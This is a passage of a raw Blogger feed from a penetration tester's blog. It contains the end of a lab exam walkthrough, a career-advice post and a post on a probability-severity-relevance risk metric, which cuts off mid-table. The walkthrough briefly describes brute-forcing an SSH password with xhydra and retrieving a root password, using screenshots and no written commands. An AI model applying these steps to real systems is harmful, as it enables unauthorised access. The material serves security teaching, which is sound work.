src="http://4.bp.blogspot.com/-2HFOB_-yJNM/TsY2Tvx9HwI/AAAAAAAAAhs/ZXp35zhZSEw/s400/bruteforce.jpg" alt="" id="BLOGGER_PHOTO_ID_5676284093218496258" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-QG9nzeIIiuk/TsY4DkPR1VI/AAAAAAAAAh4/NHJ1gX2q5z0/s1600/bruteforce1.jpg"&gt;&lt;img style="cursor: pointer; width: 514px; height: 268px;" src="http://4.bp.blogspot.com/-QG9nzeIIiuk/TsY4DkPR1VI/AAAAAAAAAh4/NHJ1gX2q5z0/s400/bruteforce1.jpg" alt="" id="BLOGGER_PHOTO_ID_5676286014265611602" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;And xhdra should gain a password in a few minutes.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-j1JvamhLIVc/TsY5tmVVUtI/AAAAAAAAAiE/l3AR4TYbpFc/s1600/bruteforce2.jpg"&gt;&lt;img style="cursor: pointer; width: 400px; height: 457px;" src="http://4.bp.blogspot.com/-j1JvamhLIVc/TsY5tmVVUtI/AAAAAAAAAiE/l3AR4TYbpFc/s400/bruteforce2.jpg" alt="" id="BLOGGER_PHOTO_ID_5676287835894010578" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Now we have a password, all we need to do is get into the box via 22 as we had that information from our Info gathering stage and we should see the zip file in the / of the system, we copy it to michele home directory since we dont have permissions to write in slash linux skeleton directory. and we should have the password to root.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-sXcsA6plGOs/TsY7FRfTJ6I/AAAAAAAAAiQ/bKArE04jQOQ/s1600/login.jpg"&gt;&lt;img style="cursor: pointer; width: 677px; height: 621px;" src="http://1.bp.blogspot.com/-sXcsA6plGOs/TsY7FRfTJ6I/AAAAAAAAAiQ/bKArE04jQOQ/s400/login.jpg" alt="" id="BLOGGER_PHOTO_ID_5676289342127155106" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-Ev6P21GiH3w/TsZMo9n_EZI/AAAAAAAAAic/QLFQfKBV6vI/s1600/thezipfile1.jpg"&gt;&lt;img style="cursor: pointer; width: 562px; height: 377px;" src="http://3.bp.blogspot.com/-Ev6P21GiH3w/TsZMo9n_EZI/AAAAAAAAAic/QLFQfKBV6vI/s400/thezipfile1.jpg" alt="" id="BLOGGER_PHOTO_ID_5676308646967841170" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-9082999007032236420?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/9082999007032236420/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=9082999007032236420' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/9082999007032236420'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/9082999007032236420'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2011/11/one-of-exams-i-had-set-this-october.html' title='One of the exams i had set this October 2011'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-EpGvIWOFilw/TsDPtqu7sEI/AAAAAAAAAfo/Pc9mDpFbk_I/s72-c/nmap.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-6395727854115935806</id><published>2011-08-20T14:26:00.003+03:00</published><updated>2011-08-20T14:36:25.653+03:00</updated><title type='text'>LIFE IN INFORMATION SECURITY- PART 1</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-Ug6qm4XMhA4/Tk-bGOzNsBI/AAAAAAAAAds/EDo1sUJrHgw/s1600/shield.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 165px; height: 158px;" src="http://3.bp.blogspot.com/-Ug6qm4XMhA4/Tk-bGOzNsBI/AAAAAAAAAds/EDo1sUJrHgw/s400/shield.png" alt="" id="BLOGGER_PHOTO_ID_5642899389472944146" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Information security is one career that a lot of Techis out there have mistaken what it entails a lot. I have seen some people think that because they can run nmap on an MS box they can do VA assessments for an organization. Others think coz they can develop code they can actually hack. Others come straight from college and join a security company, handed in some company questionnaires and shown how to scare clients when they need to do an audit, only to find they are asking for SAM files from a unix admin, LULZ. Am not hating but I think I need to talk about this.&lt;br /&gt;&lt;br /&gt;Personally my skill-set is penetration testing, but how I got here was nasty. I started with repairing computers and mobile devices back in 1999/2000, then went into structured cabling, later I was administering domains and huge networks and I had to script code and I ended up indulging into development. As I went on, security became  a huge interest and there was no guys in Nairobi I could get advice from, so I had to do research and heavy studies by myself.&lt;br /&gt;&lt;br /&gt;With 11 years in this career am still learning new things everyday.&lt;br /&gt;&lt;br /&gt;So here are some aspects to those who want to do security at higher level. By higher level I mean, working in those institutions where Security is taken seriously:&lt;br /&gt;&lt;br /&gt;a) IT Background, Research and studies&lt;br /&gt;b) Health and fitness&lt;br /&gt;c) Personal Security&lt;br /&gt;d) Patience&lt;br /&gt;e) Independence&lt;br /&gt;f) Intelligence&lt;br /&gt;g) Confidentiality&lt;br /&gt;&lt;br /&gt;As days go by, I will write on these aspects above.&lt;br /&gt;&lt;br /&gt;With all regards,&lt;br /&gt;&lt;br /&gt;./Chucks&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-6395727854115935806?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/6395727854115935806/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=6395727854115935806' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6395727854115935806'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/6395727854115935806'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2011/08/life-in-information-security-part-1.html' title='LIFE IN INFORMATION SECURITY- PART 1'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-Ug6qm4XMhA4/Tk-bGOzNsBI/AAAAAAAAAds/EDo1sUJrHgw/s72-c/shield.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-7877009076125020841</id><published>2011-08-10T17:49:00.006+03:00</published><updated>2011-08-20T14:53:52.804+03:00</updated><title type='text'>Calculating PSR and the Reason to</title><content type='html'>So what is PSR, what does it stand for? In short P means Probability, S is Severity and R is relevance. This metric looks at the probability of the vulnerabilities found and how they can be exploited, with ease or with loads of trial and error. Its also looks at the severity of the impact they will cause to the organization in case exploited and then the relevance of the asset to the organization.&lt;br /&gt;&lt;br /&gt;Below is a table we can calculate the P = Probability with.&lt;br /&gt;&lt;br /&gt;	&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt; 	&lt;title&gt;&lt;/title&gt; 	&lt;meta name="GENERATOR" content="OpenOffice.org 3.3  (Linux)"&gt; 	&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		TD P { margin-bottom: 0in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;  &lt;table style="color: rgb(0, 0, 0);" border="1" cellpadding="7" cellspacing="0" width="388"&gt; 	&lt;col width="103"&gt; 	&lt;col width="255"&gt; 	&lt;tbody&gt;&lt;tr valign="top"&gt; 		&lt;td bg="" style="color: rgb(191, 191, 191);" width="103"&gt; 			&lt;p&gt;&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;&lt;b&gt;Probability&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td style="color: rgb(255, 255, 255);" bgcolor="#bfbfbf" width="255"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_82"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_83"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_84"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_85"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_86"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_87"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_88"&gt;&lt;/a&gt; 			&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;&lt;b&gt;The likelihood 			that the risk will take place:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_89"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_90"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;5&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 255, 255);"&gt; &lt;/span&gt;&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;- 			Very High&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td style="color: rgb(255, 255, 255);" width="255"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_92"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_93"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_94"&gt;&lt;/a&gt; 			&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;Is almost certain 			(P &amp;gt; 95%)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_95"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;4 			- High&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td width="255"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_97"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_98"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_99"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;Is very likely 			(65% &amp;lt; P ≤ 95%)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_100"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;3 			- Medium&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td width="255"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_102"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_103"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;Is likely (35% 			&amp;lt; P ≤ 65%)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_104"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;2 			- Low&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td style="color: rgb(255, 255, 255);" width="255"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_106"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_107"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_108"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_109"&gt;&lt;/a&gt; 			&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;Is not very 			likely (5% &amp;lt; P ≤ 35%)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_110"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_111"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;1 - Very Low&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td width="255"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_113"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;Is 			unlikely (P ≤ 5%)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;So for the auditor to estimate the probability he has to consider several factors,&lt;br /&gt;&lt;br /&gt;a) The knowledge requires to have a working exploit on the specified flaw. So the more the knowledge required the higher the probability.&lt;br /&gt;b) The resource required to attack and exploit the flaw will also major out on the probability, the fewer the resource the higher the probability.&lt;br /&gt;c) The duration required to exploit the flaw, if the intruder would take a short time, then the probability goes higher.&lt;br /&gt;d) Also how important the target is, e.g a Banking server, where most attackers would wont to fully exploit flaws makes the P vary alot. The more attractive the system is the higher the probability&lt;br /&gt;e) How well the asset is protected, physical and operation wise, if lower the protection the higher the probability.&lt;br /&gt;f) Environmental, political, weather also affects the probability variations&lt;br /&gt;&lt;br /&gt;So probability is a way of looking at a view of the like hood a risk might happen, while severity will evaluate the level of impact on the asset and organization if it takes place.&lt;br /&gt;&lt;br /&gt;	&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt; 	&lt;title&gt;&lt;/title&gt; 	&lt;meta name="GENERATOR" content="OpenOffice.org 3.3  (Linux)"&gt; 	&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		TD P { margin-bottom: 0in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;  &lt;table style="color: rgb(0, 0, 0);" border="1" cellpadding="7" cellspacing="0" width="388"&gt; 	&lt;col width="102"&gt; 	&lt;col width="256"&gt; 	&lt;tbody&gt;&lt;tr valign="top"&gt; 		&lt;td bg="" style="color: rgb(255, 255, 255);" width="102"&gt; 			&lt;p&gt;&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;&lt;b&gt;Severity&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td bgcolor="#bfbfbf" width="256"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_286"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_287"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_288"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_289"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_290"&gt;&lt;/a&gt; 			&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;&lt;b&gt;The risk 			taking place will cause:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td style="color: rgb(255, 255, 255);" width="102"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_291"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_292"&gt;&lt;/a&gt; 			&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;5 - Very High&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td valign="top" width="256"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_294"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;Major 			impairment&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="102"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_295"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;4 			- High&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td valign="top" width="256"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_297"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_298"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;Very severe 			impairment&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="102"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_299"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;3 			- Medium&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td valign="top" width="256"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_301"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;Severe 			impairment&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="102"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_302"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;2 			- Low&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td valign="top" width="256"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_304"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_305"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;Less severe 			impairment&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="102"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_306"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_307"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;1 - Very Low&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td valign="top" width="256"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_309"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_310"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;Almost no 			impairment&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;So for the auditor to estimate the severity he has to consider several factors,&lt;br /&gt;a) The degree of impairment of the reliability of the process results or information as well as the systems or related environment supported by the asset.&lt;br /&gt;b) Degree of impairment of the assets performance.&lt;br /&gt;c) The impairment of the quality of services, systems and information.&lt;br /&gt;&lt;br /&gt;Thirdly is the relevance of the asset, where the importance of it is valued and what it supports to the business/organization.&lt;br /&gt;&lt;br /&gt;	&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt; 	&lt;title&gt;&lt;/title&gt; 	&lt;meta name="GENERATOR" content="OpenOffice.org 3.3  (Linux)"&gt; 	&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		TD P { margin-bottom: 0in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;  &lt;table style="color: rgb(0, 0, 0);" border="1" cellpadding="7" cellspacing="0" width="388"&gt; 	&lt;col width="103"&gt; 	&lt;col width="255"&gt; 	&lt;tbody&gt;&lt;tr valign="top"&gt; 		&lt;td bg="" style="color: rgb(191, 191, 191);" width="103"&gt; 			&lt;p&gt;&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;&lt;b&gt;Relevance&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td bgcolor="#bfbfbf" width="255"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_390"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_391"&gt;&lt;/a&gt; 			&lt;span style="font-family:Times New Roman,serif;"&gt;&lt;span style="font-size:100%;"&gt;&lt;b&gt;The asset’s 			impairment:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_392"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_393"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;5 - Very High&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td valign="top" width="255"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_395"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_396"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_397"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_398"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_399"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_400"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_401"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_402"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_403"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_404"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;May affect the 			entire organization and losses will be extremely high&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_405"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;4 			- High&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td valign="top" width="255"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_407"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_408"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_409"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_410"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_411"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_412"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_413"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_414"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_415"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_416"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_417"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_418"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_419"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;May affect one or 			more of the organization’s businesses and losses will be high&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_420"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;3 			- Medium&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td valign="top" width="255"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_422"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_423"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_424"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_425"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_426"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_427"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_428"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_429"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_430"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_431"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_432"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;May affect a part 			of the organization’s business and losses will be considerable&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="103"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_433"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;2 			- Low&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 		&lt;td valign="top" width="255"&gt; 			&lt;p&gt;&lt;a name="SPELLING_ERROR_435"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_436"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_437"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_438"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_439"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_440"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_441"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_442"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_443"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_444"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_445"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_446"&gt;&lt;/a&gt;&lt;a name="SPELLING_ERROR_447"&gt;&lt;/a&gt; 			&lt;span style="color: rgb(255, 255, 255);font-family:Times New Roman,serif;" &gt;&lt;span style="font-size:100%;"&gt;May affect a 			small and localized part of the organization and losses will be 			low&lt;/span&gt;&lt;/span&gt;&lt;/p&gt; 		&lt;/td&gt; 	&lt;/tr&gt; 	&lt;tr&gt; 		&lt;td width="103"&gt; 			